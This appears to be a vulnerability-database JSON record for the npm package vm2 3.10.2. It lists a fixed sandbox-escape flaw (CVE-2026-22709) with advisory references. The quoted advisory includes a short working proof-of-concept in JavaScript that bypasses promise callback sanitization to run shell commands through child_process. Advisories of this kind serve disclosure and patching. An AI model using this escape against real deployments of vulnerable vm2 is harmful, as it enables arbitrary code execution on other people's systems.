{"url":"http://public2.vulnerablecode.io/api/packages/73623?format=json","purl":"pkg:npm/vm2@3.10.2","type":"npm","namespace":"","name":"vm2","version":"3.10.2","qualifiers":{},"subpath":"","is_vulnerable":false,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49851?format=json","vulnerability_id":"VCID-gqm5-bhj5-k3cf","summary":"vm2 has a Sandbox Escape\nIn vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.\n\n```js\nconst { VM } = require(\"vm2\");\n\nconst code = `\nconst error = new Error();\nerror.name = Symbol();\nconst f = async () => error.stack;\nconst promise = f();\npromise.catch(e => {\nconst Error = e.constructor;\nconst Function = Error.constructor;\nconst f = new Function(\n\"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })\"\n);\nf();\n});\n`;\n\nnew VM().run(code);\n```\n\nIn lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object.","references":[{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.2","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22709","reference_id":"CVE-2026-22709","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22709"},{"reference_url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73623?format=json","purl":"pkg:npm/vm2@3.10.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.2"}],"aliases":["CVE-2026-22709","GHSA-99p7-6v5w-7xg8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gqm5-bhj5-k3cf"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.2"}